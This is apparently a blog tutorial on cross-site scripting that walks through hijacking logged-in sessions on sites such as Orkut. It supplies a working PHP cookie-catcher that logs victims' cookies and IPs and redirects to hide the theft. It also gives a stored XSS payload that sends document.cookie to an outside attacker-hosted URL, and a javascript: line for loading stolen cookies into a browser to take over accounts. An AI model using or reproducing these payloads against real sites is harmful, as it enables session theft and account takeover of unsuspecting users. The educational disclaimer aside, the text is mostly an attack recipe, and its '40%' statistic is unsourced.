Disclaimer: The below written article is only written for educational purposes. The whole purpose of this article is to aware people about the security threats & we believe that you agree that the information will not be used for illegal purposes.
==================
Hi guys this article is all about XSS Attack. In the recent studies it has been found that this type of attack is responsible for about 40% of the websites which are hacked(2007-2010).The reason behind this is poor input validations or no validations at all.
A small vulnerability can lead to huge loss & Input from a user must always be processed befor further allowing it to act or store.
XSS Stands for Cross Site Scripting. I know what you are thinking if it is Cross Site Scripting why it is abbreviated as XSS and not CSS !! Well the answer to this obvious question is very simple. CSS is already being used for Cascading Style Sheets and so as to remove the confusion it has been named as XSS.
XSS has many varients. Well as i have analyzed XSS Attacks are done on different sites with different methods but the whole logical funda behind it remains the same.
Attacker hosts supporting scripts on another website. Attacker exploits the Input Validation vulnerability and attacks.
For your surprise and interest let me tell you that Not even Websites like Myspace, Facebook Orkut, Google etc been spared from this attack.
In mid 2009 alot of orkut users complainted that scraps are being written from their account even when they have choosed the Strongest Password they could think of.They claimed that their account is being hacked.
Well they were right upto some extent. Actually it was not account Password which was being hacked, it was the logged in SESSION.
Another Question? How can a session be hacked when it is usually generated from a very strong algorithm or does it mean that some people came to know how to generate sessions based on the usernames.
Scratching your head?????? Stop that habit
.
Well as our topic is about XSS obviously the answer to this is related to XSS. Its the XSS attack.
Now what this attack is and how hackers were doing it?
Okey now enough questions and theories lets begin with the logic
.
First of all let me tell you when we login to a website most of the websites store the logged in information in cookies and these cookies are stored into our machine via our browser(asked to do so so that the navigation is controlled via a generated session and user can be identified uniquely ).
To check login to some website and write this script in url javascript:alert(document.cookie); and your cookie related to that site will popup (Your browser should support javascript,well almost all does).
Lets think from an evil mind now. Suppose someone copies your cookies and place it in his machine and refreshes the browser window what will happen!… Yes If that website is XSS Vulnerable you will see that you got the authentication of the account whose cookies you had copied.
Cool isn’t it? But now how to copy a cookie of someone else as we have no access to the hard drive of that user also we don’t see a copy cookie button
haha .
Here comes the vulnerability part. Some websites were not validating the user input and was directly accomodating the text into the page. In simple words Suppose i write a JavaScript and write in someone’s ScrapBook. When ever the user will open his/her scrapbook that javascript will execute.
Does that scare you? Well to some people it did when they came to know that their session is being hacked.
Stay Calm lets learn more about this … How can a javascript extracts the cookie of a website !! I think i answered this question already,Yeah document.cookie is the answer.
Umm… Okey i know how to popup my cookie but what about others and how the hell i will get others cookie?
Lets create a Cookie Catcher script. Our script will be written in PHP and will be hosted on some other website which allow hosting php scripts.
===========A simple Cookie Catcher Script=============
<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location: http://www.google.com”); //or send back to referer to hide this fact
?>
======================end of code===================
suppose the hosted address of this script is http://www.depinderbharti.com/cookie.php
lets write a scrapbook/forums/Injection entry with this code
====================exploitation Code(Cookie Sender)======================
<script>
document.location=”http://www.depinderbharti.com/cookie.php?c=” + document.cookie;
</script>
=================end of code====================================
now who ever will open this page he will be redirected to the cookie catcher script location . later on he will be redirected back to some other page ( based on what url u write in the script)
Meanwhile the cookies will be copied from his/her system and will reach to the cookie catcher script.
The cookies will then be stored in cookies.html webpage via the cookie catcher script.
Now we have cookies of a user how to merge it into our local system cookies.
copy the cookies and execute the below written code into your webbrowser’s URL box.
======================Merging in local======================
javascript:void(document.cookie=”paste those copied cookies here”) hit enter
==================end of code========================
Now open that attacked website simply www.blabla.com and you will see that you are logged in.
So next time you browse internet look the webpages and their redirection properly.
================
. Usually he comes and goes without logout 
